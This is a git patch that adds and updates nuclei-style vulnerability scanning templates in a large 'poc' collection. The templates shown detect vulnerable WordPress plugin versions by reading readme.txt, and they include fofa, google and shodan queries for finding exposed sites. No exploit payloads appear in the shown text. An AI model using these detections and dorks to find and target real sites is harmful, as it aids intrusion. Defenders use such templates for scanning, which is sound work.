From deeb63a6df68a817960a6e4d08eb69455402279c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 11 Sep 2024 12:39:43 +0000 Subject: [PATCH] 20240911 --- date.txt | 2 +- poc.txt | 38 ++++++ poc/aws/s3hunter.yaml | 27 ++--- ...5212-cf8915aa91ee39b2dc6d30f9dfffa142.yaml | 59 ++++++++++ poc/cve/CVE-2023-2919.yaml | 59 ++++++++++ ...6067-6d5f6295ab44f72b338a0a1499add7f5.yaml | 59 ++++++++++ ...5061-085abacaaba8ff4788c74e8b165121fb.yaml | 59 ++++++++++ ...5416-b035cee38aeca20c0511efbe55146c96.yaml | 59 ++++++++++ poc/cve/CVE-2024-6282.yaml | 59 ++++++++++ ...6335-84de910af85c0afe2f599b3df45be46d.yaml | 59 ++++++++++ poc/cve/CVE-2024-7618.yaml | 59 ++++++++++ ...7626-6cce2d74a4b9b1a75cb8e104eb400ce1.yaml | 59 ++++++++++ poc/cve/CVE-2024-7655.yaml | 59 ++++++++++ ...7721-dabffc45b2b1ccb0d8463248830df7d5.yaml | 59 ++++++++++ ...7727-4fe4538f75c6cfd03c0ffd7da47ebf37.yaml | 59 ++++++++++ poc/cve/CVE-2024-7770.yaml | 59 ++++++++++ ...8045-fae1d4f6a9ba77de83e71f29fe31f38e.yaml | 59 ++++++++++ poc/cve/CVE-2024-8241.yaml | 59 ++++++++++ ...8253-e2234cc208110923d0c092c69c0a152e.yaml | 59 ++++++++++ poc/cve/CVE-2024-8268.yaml | 59 ++++++++++ ...8277-60e40034fde9b34dd19d7bd360de5d19.yaml | 59 ++++++++++ poc/cve/CVE-2024-8369.yaml | 59 ++++++++++ ...8440-a970a1df0c7918e0736009309dc70109.yaml | 59 ++++++++++ poc/cve/CVE-2024-8478.yaml | 59 ++++++++++ poc/cve/CVE-2024-8543.yaml | 59 ++++++++++ poc/cve/cve-2020-16920.yaml | 110 +++++++++--------- poc/cve/cve-2020-36112.yaml | 30 +++++ poc/cve/cve-2021-20837.yaml | 66 +++++------ poc/cve/cve-2022-0921.yaml | 28 +++-- poc/debug/wp-debug-log.yaml | 58 ++++----- poc/google/google-secrets.yaml | 16 +-- ...-php-38595c300b5439c3ff06f9de9b42f302.yaml | 59 ++++++++++ ...Hikvision_iVMS-8700_Fileupload_report.yaml | 47 +++++--- .../Hikvision_Env_Information_Leakage.yaml | 47 +++++--- poc/other/Nsfocus_sas_getFile_read.yaml | 31 +---- ...unds-7eca2ce569a1f864194b199d672f550a.yaml | 59 ++++++++++ ...ipes-ac134c4c789175dd88aaa9146cd4dc1c.yaml | 59 ++++++++++ ...ntor-4124ad49f7a0510cf08a935c97d1246a.yaml | 59 ++++++++++ ...lite-6f7de55f53ce42165d9aa81f04368fe3.yaml | 59 ++++++++++ poc/other/groovy-console-open.yaml | 20 ++-- ...ayer-54a27fb63349216a80cf2f59f38ae402.yaml | 59 ++++++++++ poc/other/jenk.yaml | 2 +- poc/other/nova-blocks.yaml | 59 ++++++++++ ...grid-eaed240a4f4b283e08088fd58f4489e7.yaml | 59 ++++++++++ poc/other/qualitor.yaml | 20 ++++ ...der-comparison-image-before-and-after.yaml | 59 ++++++++++ ...ager-44229e301b00fab19a97495d12bba74f.yaml | 59 ++++++++++ ...-php-38595c300b5439c3ff06f9de9b42f302.yaml | 59 ++++++++++ .../Hikvision_applyCT_RCE.yaml | 45 +++++-- ...iews-8eabd8f3601428e7f9c625d55482bc6c.yaml | 59 ++++++++++ ...ecology-oa-HrmCareerApplyPerView-sqli.yaml | 30 ++--- poc/sql/ecology-sqli2.yaml | 6 +- poc/sql/error-based-sqli.yaml | 7 +- ...ayer-1d6d633d5a9085295638ff332db34930.yaml | 59 ++++++++++ ...ecology-oa-HrmCareerApplyPerView-sqli.yaml | 30 ++--- poc/sql_injection/ecology-sqli2.yaml | 6 +- poc/sql_injection/error-based-sqli.yaml | 7 +- poc/ssrf/generic-ssrf.yaml | 2 +- ...Hikvision_iVMS-8700_Fileupload_report.yaml | 47 +++++--- .../Nsfocus_NF_Firewall_FileUpload.yaml | 65 +++-------- poc/wordpress/wp-debug-log.yaml | 58 ++++----- ...tbox-fc78c591ca38d0ab42ea5c6753b32375.yaml | 59 ++++++++++ 62 files changed, 2564 insertions(+), 405 deletions(-) create mode 100644 poc/cve/CVE-2019-25212-cf8915aa91ee39b2dc6d30f9dfffa142.yaml create mode 100644 poc/cve/CVE-2023-2919.yaml create mode 100644 poc/cve/CVE-2023-6067-6d5f6295ab44f72b338a0a1499add7f5.yaml create mode 100644 poc/cve/CVE-2024-5061-085abacaaba8ff4788c74e8b165121fb.yaml create mode 100644 poc/cve/CVE-2024-5416-b035cee38aeca20c0511efbe55146c96.yaml create mode 100644 poc/cve/CVE-2024-6282.yaml create mode 100644 poc/cve/CVE-2024-6335-84de910af85c0afe2f599b3df45be46d.yaml create mode 100644 poc/cve/CVE-2024-7618.yaml create mode 100644 poc/cve/CVE-2024-7626-6cce2d74a4b9b1a75cb8e104eb400ce1.yaml create mode 100644 poc/cve/CVE-2024-7655.yaml create mode 100644 poc/cve/CVE-2024-7721-dabffc45b2b1ccb0d8463248830df7d5.yaml create mode 100644 poc/cve/CVE-2024-7727-4fe4538f75c6cfd03c0ffd7da47ebf37.yaml create mode 100644 poc/cve/CVE-2024-7770.yaml create mode 100644 poc/cve/CVE-2024-8045-fae1d4f6a9ba77de83e71f29fe31f38e.yaml create mode 100644 poc/cve/CVE-2024-8241.yaml create mode 100644 poc/cve/CVE-2024-8253-e2234cc208110923d0c092c69c0a152e.yaml create mode 100644 poc/cve/CVE-2024-8268.yaml create mode 100644 poc/cve/CVE-2024-8277-60e40034fde9b34dd19d7bd360de5d19.yaml create mode 100644 poc/cve/CVE-2024-8369.yaml create mode 100644 poc/cve/CVE-2024-8440-a970a1df0c7918e0736009309dc70109.yaml create mode 100644 poc/cve/CVE-2024-8478.yaml create mode 100644 poc/cve/CVE-2024-8543.yaml create mode 100644 poc/cve/cve-2020-36112.yaml mode change 100755 => 100644 poc/debug/wp-debug-log.yaml create mode 100644 poc/javascript/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml create mode 100644 poc/other/advanced-backgrounds-7eca2ce569a1f864194b199d672f550a.yaml create mode 100644 poc/other/delicious-recipes-ac134c4c789175dd88aaa9146cd4dc1c.yaml create mode 100644 poc/other/elementor-4124ad49f7a0510cf08a935c97d1246a.yaml create mode 100644 poc/other/essential-addons-for-elementor-lite-6f7de55f53ce42165d9aa81f04368fe3.yaml create mode 100644 poc/other/html5-video-player-54a27fb63349216a80cf2f59f38ae402.yaml create mode 100644 poc/other/nova-blocks.yaml create mode 100644 poc/other/post-grid-eaed240a4f4b283e08088fd58f4489e7.yaml create mode 100644 poc/other/qualitor.yaml create mode 100644 poc/other/slider-comparison-image-before-and-after.yaml create mode 100644 poc/other/tracking-code-manager-44229e301b00fab19a97495d12bba74f.yaml create mode 100644 poc/php/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml create mode 100644 poc/remote_code_execution/woocommerce-photo-reviews-8eabd8f3601428e7f9c625d55482bc6c.yaml create mode 100644 poc/sql/html5-video-player-1d6d633d5a9085295638ff332db34930.yaml mode change 100755 => 100644 poc/wordpress/wp-debug-log.yaml create mode 100644 poc/wordpress/wp-responsive-video-gallery-with-lightbox-fc78c591ca38d0ab42ea5c6753b32375.yaml diff --git a/date.txt b/date.txt index 83b31cda11..2abf40291e 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240910 +20240911 diff --git a/poc.txt b/poc.txt index 23d0ead20c..f56864bfcc 100644 --- a/poc.txt +++ b/poc.txt @@ -13997,6 +13997,7 @@ ./poc/cve/CVE-2019-25152-4e7b3d2899eea5aa12c073c8cef2fd0d.yaml ./poc/cve/CVE-2019-25152-72081e24ce32b3d7a0640320e699b222.yaml ./poc/cve/CVE-2019-25152.yaml +./poc/cve/CVE-2019-25212-cf8915aa91ee39b2dc6d30f9dfffa142.yaml ./poc/cve/CVE-2019-2578-1.yaml ./poc/cve/CVE-2019-2578-2.yaml ./poc/cve/CVE-2019-2578.yaml @@ -26380,6 +26381,7 @@ ./poc/cve/CVE-2023-29174-61b19180a709a75a8f2f6bd443cf11c8.yaml ./poc/cve/CVE-2023-29174.yaml ./poc/cve/CVE-2023-2919-66712a820c7b5deedf6bafaea3bd5105.yaml +./poc/cve/CVE-2023-2919.yaml ./poc/cve/CVE-2023-29197-7dc7820b451dace4c37e93f29ab994ee.yaml ./poc/cve/CVE-2023-29197-a89dc10c82ed3d904f8fccc2ff4db320.yaml ./poc/cve/CVE-2023-29197.yaml @@ -31981,6 +31983,7 @@ ./poc/cve/CVE-2023-6065-5ad50c58e298bc77570d945554b07077.yaml ./poc/cve/CVE-2023-6065.yaml ./poc/cve/CVE-2023-6067-23c24c19315775c2194006beecf7ca05.yaml +./poc/cve/CVE-2023-6067-6d5f6295ab44f72b338a0a1499add7f5.yaml ./poc/cve/CVE-2023-6067.yaml ./poc/cve/CVE-2023-6077-b787a70a99222689ff4a051daad2ffd8.yaml ./poc/cve/CVE-2023-6077.yaml @@ -41221,6 +41224,7 @@ ./poc/cve/CVE-2024-5059.yaml ./poc/cve/CVE-2024-5060-0e9bb89e270fce112d686bcb31ddac36.yaml ./poc/cve/CVE-2024-5060.yaml +./poc/cve/CVE-2024-5061-085abacaaba8ff4788c74e8b165121fb.yaml ./poc/cve/CVE-2024-5061-e85fb07ba4a08a3b3d95773fe18c51f6.yaml ./poc/cve/CVE-2024-5061.yaml ./poc/cve/CVE-2024-5071-783fe5cda41afb7fa1d0cebcc413aaf2.yaml @@ -41419,6 +41423,7 @@ ./poc/cve/CVE-2024-5349.yaml ./poc/cve/CVE-2024-5382-3f1ae151e74bf3a85689b92b47a722f8.yaml ./poc/cve/CVE-2024-5382.yaml +./poc/cve/CVE-2024-5416-b035cee38aeca20c0511efbe55146c96.yaml ./poc/cve/CVE-2024-5418-434a339fc4d8515bf3d8877608840f7e.yaml ./poc/cve/CVE-2024-5418.yaml ./poc/cve/CVE-2024-5419-6c5a95dfcb26729f4b1f7034ca7aef48.yaml @@ -41958,6 +41963,7 @@ ./poc/cve/CVE-2024-6272-603d5732dac8de6d8f0b5ed827bd29fe.yaml ./poc/cve/CVE-2024-6272.yaml ./poc/cve/CVE-2024-6282-9839fb12a0e52741eda32351ffbc9c9f.yaml +./poc/cve/CVE-2024-6282.yaml ./poc/cve/CVE-2024-6283-b109f55830b5166e15fc8153b2a56ea0.yaml ./poc/cve/CVE-2024-6283.yaml ./poc/cve/CVE-2024-6288-3b7a2d7a942fc59043d359b6700da5b3.yaml @@ -42014,6 +42020,7 @@ ./poc/cve/CVE-2024-6332.yaml ./poc/cve/CVE-2024-6334-32cc27bdc2750532a6a94260dc479796.yaml ./poc/cve/CVE-2024-6334.yaml +./poc/cve/CVE-2024-6335-84de910af85c0afe2f599b3df45be46d.yaml ./poc/cve/CVE-2024-6338-2cb15f594519463fb002e59f93b4f8b0.yaml ./poc/cve/CVE-2024-6338.yaml ./poc/cve/CVE-2024-6339-8aab95c35ab2f543f319207ba5af5758.yaml @@ -42535,6 +42542,7 @@ ./poc/cve/CVE-2024-7611-fa595bf0bd7d1cd7d067d139d8655508.yaml ./poc/cve/CVE-2024-7611.yaml ./poc/cve/CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a.yaml +./poc/cve/CVE-2024-7618.yaml ./poc/cve/CVE-2024-7620-bcec0146e1a4df3dcb256abef7433801.yaml ./poc/cve/CVE-2024-7620.yaml ./poc/cve/CVE-2024-7621-410ca600b3388f15ef833a17e3d39b81.yaml @@ -42543,6 +42551,7 @@ ./poc/cve/CVE-2024-7622.yaml ./poc/cve/CVE-2024-7624-ebfd9e3cba7ebe22ec232d00cda9ba4f.yaml ./poc/cve/CVE-2024-7624.yaml +./poc/cve/CVE-2024-7626-6cce2d74a4b9b1a75cb8e104eb400ce1.yaml ./poc/cve/CVE-2024-7627-89a7ba1cc9a6f6445a389a024cfcf883.yaml ./poc/cve/CVE-2024-7627.yaml ./poc/cve/CVE-2024-7628-3bb6c5b2894c843f8737291215f30580.yaml @@ -42561,6 +42570,7 @@ ./poc/cve/CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8.yaml ./poc/cve/CVE-2024-7651.yaml ./poc/cve/CVE-2024-7655-cb8797e18cf270e181c88790358f477b.yaml +./poc/cve/CVE-2024-7655.yaml ./poc/cve/CVE-2024-7656-cc628b96623048172302ddea18aada71.yaml ./poc/cve/CVE-2024-7656.yaml ./poc/cve/CVE-2024-7687-ec8f591b67a17cc36542cbb68d2a1c0e.yaml @@ -42581,7 +42591,10 @@ ./poc/cve/CVE-2024-7703.yaml ./poc/cve/CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e.yaml ./poc/cve/CVE-2024-7717.yaml +./poc/cve/CVE-2024-7721-dabffc45b2b1ccb0d8463248830df7d5.yaml +./poc/cve/CVE-2024-7727-4fe4538f75c6cfd03c0ffd7da47ebf37.yaml ./poc/cve/CVE-2024-7770-0dc95a63b6c1c6ccfca48ccb324269b5.yaml +./poc/cve/CVE-2024-7770.yaml ./poc/cve/CVE-2024-7775-cb89a9bf3c0d813debb09dc21c3f085f.yaml ./poc/cve/CVE-2024-7775.yaml ./poc/cve/CVE-2024-7777-e2bdcc8b58b83d53647a50d88143707d.yaml @@ -42645,6 +42658,7 @@ ./poc/cve/CVE-2024-8043.yaml ./poc/cve/CVE-2024-8044-c5c06b8842bfb695b2f240b2af75787b.yaml ./poc/cve/CVE-2024-8044.yaml +./poc/cve/CVE-2024-8045-fae1d4f6a9ba77de83e71f29fe31f38e.yaml ./poc/cve/CVE-2024-8046-15e0de38601f3b1bc315968586b907cd.yaml ./poc/cve/CVE-2024-8046.yaml ./poc/cve/CVE-2024-8047-f6817d306b4651cd60631b6b036a3959.yaml @@ -42686,15 +42700,19 @@ ./poc/cve/CVE-2024-8200-212df01da660270f0a3ccabafd9f05f2.yaml ./poc/cve/CVE-2024-8200.yaml ./poc/cve/CVE-2024-8241-14534f7d6cad6e621d3cc87a4cd42487.yaml +./poc/cve/CVE-2024-8241.yaml ./poc/cve/CVE-2024-8247-7ddc0c06e971c1cf25a0f3f37508e6b0.yaml ./poc/cve/CVE-2024-8247.yaml ./poc/cve/CVE-2024-8252-2918e2ad48b79ca4c8bb4e4cd2023c96.yaml ./poc/cve/CVE-2024-8252.yaml +./poc/cve/CVE-2024-8253-e2234cc208110923d0c092c69c0a152e.yaml ./poc/cve/CVE-2024-8268-75f27436435201ac5094d8b23bf9fb95.yaml +./poc/cve/CVE-2024-8268.yaml ./poc/cve/CVE-2024-8274-bda8d98f83bd3baa9ee6eb35650a9ef1.yaml ./poc/cve/CVE-2024-8274.yaml ./poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml ./poc/cve/CVE-2024-8276.yaml +./poc/cve/CVE-2024-8277-60e40034fde9b34dd19d7bd360de5d19.yaml ./poc/cve/CVE-2024-8289-547295faa6591e5ec09f536a86cfff13.yaml ./poc/cve/CVE-2024-8289-87a431b046b6c387f38f06ebe340c64f.yaml ./poc/cve/CVE-2024-8289.yaml @@ -42711,16 +42729,20 @@ ./poc/cve/CVE-2024-8363-7b614cefc269f651d0fa9d8a81fb52fb.yaml ./poc/cve/CVE-2024-8363.yaml ./poc/cve/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml +./poc/cve/CVE-2024-8369.yaml ./poc/cve/CVE-2024-8427-fbcab5496b8138780394aea71f3f3840.yaml ./poc/cve/CVE-2024-8427.yaml ./poc/cve/CVE-2024-8428-3b140a48fddab0e2501d7d69c672d7cf.yaml ./poc/cve/CVE-2024-8428.yaml +./poc/cve/CVE-2024-8440-a970a1df0c7918e0736009309dc70109.yaml ./poc/cve/CVE-2024-8478-2c5877806cf2b984d8159c04c86877bf.yaml +./poc/cve/CVE-2024-8478.yaml ./poc/cve/CVE-2024-8480-f1d8d42bfc1633b849f4ef6346a133c9.yaml ./poc/cve/CVE-2024-8480.yaml ./poc/cve/CVE-2024-8538-001bcf7ee52037e79f6a696add474366.yaml ./poc/cve/CVE-2024-8538.yaml ./poc/cve/CVE-2024-8543-0a87e99d4b00c51f4b0142f0f5daaa10.yaml +./poc/cve/CVE-2024-8543.yaml ./poc/cve/CVE_2023_49442.yaml ./poc/cve/CVE_2023_51467.yaml ./poc/cve/CVE_2024_0195.yaml @@ -47675,6 +47697,7 @@ ./poc/cve/cve-2020-36112-5116.yaml ./poc/cve/cve-2020-36112-5117.yaml ./poc/cve/cve-2020-36112-5118.yaml +./poc/cve/cve-2020-36112.yaml ./poc/cve/cve-2020-36287(1).yaml ./poc/cve/cve-2020-36287-5119.yaml ./poc/cve/cve-2020-36287.yaml @@ -57647,6 +57670,7 @@ ./poc/javascript/css-js-manager-dd231efebb1e010c5c07cb1c4932234f.yaml ./poc/javascript/css-js-manager.yaml ./poc/javascript/custom-css-js-705d050c5e0c5c96bf187eb782493157.yaml +./poc/javascript/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml ./poc/javascript/custom-css-js.yaml ./poc/javascript/custom-mapview-jsp-detect.yaml ./poc/javascript/cve2json.yml @@ -63403,6 +63427,7 @@ ./poc/other/advanced-ajax-page-loader-73c51238dff4af1331aac9d91f9ae182.yaml ./poc/other/advanced-ajax-page-loader-94b986ce02c9c2e3c3d960667cb1b92d.yaml ./poc/other/advanced-ajax-page-loader.yaml +./poc/other/advanced-backgrounds-7eca2ce569a1f864194b199d672f550a.yaml ./poc/other/advanced-booking-calendar-14ec1d72b66e6743ab3b4dce700bdfbf.yaml ./poc/other/advanced-booking-calendar-1a2ee554af2bac4ad469ee7bed611a9a.yaml ./poc/other/advanced-booking-calendar-1b2f93fedafab9000d6f605166dac9f8.yaml @@ -70208,6 +70233,7 @@ ./poc/other/delete-usermetas.yaml ./poc/other/delhivery-logistics-courier-e540fdefb7cb34683c3c4a72e8a9c3bc.yaml ./poc/other/delhivery-logistics-courier.yaml +./poc/other/delicious-recipes-ac134c4c789175dd88aaa9146cd4dc1c.yaml ./poc/other/delicious-recipes-ac6497f90b87539235fa65f903a4be42.yaml ./poc/other/delicious-recipes-b301e06b5394f13942c93a763ac7eb0e.yaml ./poc/other/delicious-recipes.yaml @@ -71839,6 +71865,7 @@ ./poc/other/elementor-30bed69a3066a11bde1e59215e3cd5b4.yaml ./poc/other/elementor-32f0ca887f580098243f40cf3ab99a89.yaml ./poc/other/elementor-404bc74d32cb335460b4bb18ffb6189d.yaml +./poc/other/elementor-4124ad49f7a0510cf08a935c97d1246a.yaml ./poc/other/elementor-63a6119e4f6daaa33e6878ea6e715de3.yaml ./poc/other/elementor-7c36003a5ccd8ec9e2eb9f7969437fa3.yaml ./poc/other/elementor-8e5d5b48ff36c70993cbdc6d61dc589a.yaml @@ -72453,6 +72480,7 @@ ./poc/other/essential-addons-for-elementor-lite-666cbf792214c3d525aa565b29a0f2c6.yaml ./poc/other/essential-addons-for-elementor-lite-683680b46d9435dede777a4e11bd6500.yaml ./poc/other/essential-addons-for-elementor-lite-68816d09ad6e75dcfb11927cb6841204.yaml +./poc/other/essential-addons-for-elementor-lite-6f7de55f53ce42165d9aa81f04368fe3.yaml ./poc/other/essential-addons-for-elementor-lite-71347d2cd7685fe2d2f770d916924f17.yaml ./poc/other/essential-addons-for-elementor-lite-72d2adccac047c82b3f7cf848bce940a.yaml ./poc/other/essential-addons-for-elementor-lite-7f96d0ee0a1e53ab3608c0ca6f3fb993.yaml @@ -76167,6 +76195,7 @@ ./poc/other/html5-soundcloud-player-with-playlist-4d1667fb6e30b2ac93e754f36234469e.yaml ./poc/other/html5-soundcloud-player-with-playlist.yaml ./poc/other/html5-video-player-0d2cf6941c370b58ffb31226e43735d1.yaml +./poc/other/html5-video-player-54a27fb63349216a80cf2f59f38ae402.yaml ./poc/other/html5-video-player-ca0016b58a304c45cd93a8c5f0474313.yaml ./poc/other/html5-video-player-cba7fe3e122d338cdcaadebd04df764f.yaml ./poc/other/html5-video-player-eb51e10eb4da657b0275fe0f0befe3f2.yaml @@ -81728,6 +81757,7 @@ ./poc/other/notifyvisitors-lead-form.yaml ./poc/other/notion-phish.yaml ./poc/other/nova-blocks-0e7c62abb845144ff6b6f8011c23237b.yaml +./poc/other/nova-blocks.yaml ./poc/other/nova-lite-edebb837b13ffab3391e4efe2a95bf38.yaml ./poc/other/nova-lite.yaml ./poc/other/novelist-2fcbba4f8d24450ee551bf33de17fc72.yaml @@ -83750,6 +83780,7 @@ ./poc/other/post-grid-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/post-grid-d63e7eeaf75b63791d5823ac225229c4.yaml ./poc/other/post-grid-dcc1fae08ff10019458f6ff816f3f258.yaml +./poc/other/post-grid-eaed240a4f4b283e08088fd58f4489e7.yaml ./poc/other/post-grid-elementor-addon-cc427b19936dd19a8a708c6e47d48ade.yaml ./poc/other/post-grid-elementor-addon.yaml ./poc/other/post-grid-f2d7c7f2cc97a31a649fe636e2268f8a.yaml @@ -84646,6 +84677,7 @@ ./poc/other/quadmenu.yaml ./poc/other/qualcomm-voip-router-9771.yaml ./poc/other/qualcomm-voip-router.yaml +./poc/other/qualitor.yaml ./poc/other/quality-157cf14a019f2f39567d396451ba436d.yaml ./poc/other/quality-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/quality-theme-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -87942,6 +87974,7 @@ ./poc/other/slider-by-supsystic-e595a0c3ad3e0defdd41b40b77d69b2c.yaml ./poc/other/slider-by-supsystic.yaml ./poc/other/slider-comparison-image-before-and-after-22c03d521a5066baf973401bd293601e.yaml +./poc/other/slider-comparison-image-before-and-after.yaml ./poc/other/slider-factory-0712326ce3eb85c1c14309021d79da22.yaml ./poc/other/slider-factory-42e7c67c33e54fce9877ed077a2d8484.yaml ./poc/other/slider-factory-6352f4cd29f3e453ab1742964f7f7fd8.yaml @@ -90567,6 +90600,7 @@ ./poc/other/tracked-tweets-plugin.yaml ./poc/other/tracked-tweets.yaml ./poc/other/tracking-code-manager-059ef46ea5bc5f14527be57feee52bce.yaml +./poc/other/tracking-code-manager-44229e301b00fab19a97495d12bba74f.yaml ./poc/other/tracking-code-manager-7181bc008679cb648223a20b28d2e7e9.yaml ./poc/other/tracking-code-manager-83fec47a8c1f5faff60b8bda7bf7b2e2.yaml ./poc/other/tracking-code-manager-8b7e180c1040d966864eb92902f9b355.yaml @@ -95061,6 +95095,7 @@ ./poc/php/const-DB-php-bak.yaml ./poc/php/cryptographp-db0995fcce0b587938843ee9f532e46f.yaml ./poc/php/cryptographp.yaml +./poc/php/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml ./poc/php/default-cakephp-page.yaml ./poc/php/douphp.yaml ./poc/php/drupal_module-acl-arbitrary-php-code-execution.yaml @@ -98407,6 +98442,7 @@ ./poc/remote_code_execution/woocommerce-pdf-vouchers-724dccd0dc3c1d74c070088ae6db5625.yaml ./poc/remote_code_execution/woocommerce-pdf-vouchers-f2e20e333c1c84b75ca0fcb1020fa3d0.yaml ./poc/remote_code_execution/woocommerce-pdf-vouchers.yaml +./poc/remote_code_execution/woocommerce-photo-reviews-8eabd8f3601428e7f9c625d55482bc6c.yaml ./poc/remote_code_execution/woocommerce-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/woocommerce-plugin.yaml ./poc/remote_code_execution/woocommerce-pos-c5391e8d69ffbd0565b5ecdd695e1050.yaml @@ -105171,6 +105207,7 @@ ./poc/sql/html5-maps-09431ac7051652adb8e4fb2e66a5b8db.yaml ./poc/sql/html5-mp3-player-with-mp3-folder-feedburner-playlist-8184d8d92561017974e3799804b8964f.yaml ./poc/sql/html5-mp3-player-with-mp3-folder-feedburner-playlist.yaml +./poc/sql/html5-video-player-1d6d633d5a9085295638ff332db34930.yaml ./poc/sql/html5-video-player-66d1c126fdb6da3483cf3a67e28954d4.yaml ./poc/sql/huatian-oa-sqli.yaml ./poc/sql/huatian-oa-workFlowService-sqli.yaml @@ -117537,6 +117574,7 @@ ./poc/wordpress/wp-responsive-thumbnail-slider.yaml ./poc/wordpress/wp-responsive-video-gallery-with-lightbox-4efb64b85896db248a3009b15c2811ba.yaml ./poc/wordpress/wp-responsive-video-gallery-with-lightbox-8e39bc98f07285b3bef062b545f763f4.yaml +./poc/wordpress/wp-responsive-video-gallery-with-lightbox-fc78c591ca38d0ab42ea5c6753b32375.yaml ./poc/wordpress/wp-responsive-video-gallery-with-lightbox.yaml ./poc/wordpress/wp-rest-api-authentication-803c6ee19deb8e7eb8b2ebad82b60283.yaml ./poc/wordpress/wp-rest-api-authentication.yaml diff --git a/poc/aws/s3hunter.yaml b/poc/aws/s3hunter.yaml index d721f9c850..4ea5f03e5f 100644 --- a/poc/aws/s3hunter.yaml +++ b/poc/aws/s3hunter.yaml @@ -1,13 +1,14 @@ -id: s3-hunter -info: - name: Hunts for unreferenced AWS S3 Buckets - author: glatisant - severity: medium -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers: - - type: word - words: - - 'ListBucketResult' +id: s3-hunter + +info: + name: Hunts for unreferenced AWS S3 Buckets + author: glatisant + severity: medium +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers: + - type: word + words: + - 'ListBucketResult' \ No newline at end of file diff --git a/poc/cve/CVE-2019-25212-cf8915aa91ee39b2dc6d30f9dfffa142.yaml b/poc/cve/CVE-2019-25212-cf8915aa91ee39b2dc6d30f9dfffa142.yaml new file mode 100644 index 0000000000..0a1d49f994 --- /dev/null +++ b/poc/cve/CVE-2019-25212-cf8915aa91ee39b2dc6d30f9dfffa142.yaml @@ -0,0 +1,59 @@ +id: CVE-2019-25212-cf8915aa91ee39b2dc6d30f9dfffa142 + +info: + name: > + video carousel slider with lightbox <= 1.0.6 - Authenticated (Admin+) SQL Injection + author: topscoder + severity: low + description: > + The video carousel slider with lightbox plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.0.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/85e70be3-3ed7-4ce1-a20c-046fb7c4ec31?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2019-25212 + metadata: + fofa-query: "wp-content/plugins/wp-responsive-video-gallery-with-lightbox/" + google-query: inurl:"/wp-content/plugins/wp-responsive-video-gallery-with-lightbox/" + shodan-query: 'vuln:CVE-2019-25212' + tags: cve,wordpress,wp-plugin,wp-responsive-video-gallery-with-lightbox,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-responsive-video-gallery-with-lightbox/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-responsive-video-gallery-with-lightbox" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.6') \ No newline at end of file diff --git a/poc/cve/CVE-2023-2919.yaml b/poc/cve/CVE-2023-2919.yaml new file mode 100644 index 0000000000..9ec22d99ee --- /dev/null +++ b/poc/cve/CVE-2023-2919.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-2919 + +info: + name: > + Tutor LMS <= 2.7.4 - Cross-Site Request Forgery via 'addon_enable_disable' + author: topscoder + severity: medium + description: > + The Tutor LMS plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.7.4. This is due to missing or incorrect nonce validation on the 'addon_enable_disable' function. This makes it possible for unauthenticated attackers to enable or disable addons via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/992abd72-2a8e-4bda-94c2-4a7f88487906?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2023-2919 + metadata: + fofa-query: "wp-content/plugins/tutor/" + google-query: inurl:"/wp-content/plugins/tutor/" + shodan-query: 'vuln:CVE-2023-2919' + tags: cve,wordpress,wp-plugin,tutor,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tutor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tutor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.4') \ No newline at end of file diff --git a/poc/cve/CVE-2023-6067-6d5f6295ab44f72b338a0a1499add7f5.yaml b/poc/cve/CVE-2023-6067-6d5f6295ab44f72b338a0a1499add7f5.yaml new file mode 100644 index 0000000000..bd95475138 --- /dev/null +++ b/poc/cve/CVE-2023-6067-6d5f6295ab44f72b338a0a1499add7f5.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-6067-6d5f6295ab44f72b338a0a1499add7f5 + +info: + name: > + WP User Profile Avatar <= 1.0.2 - Authenticated (Contributor+) Stored 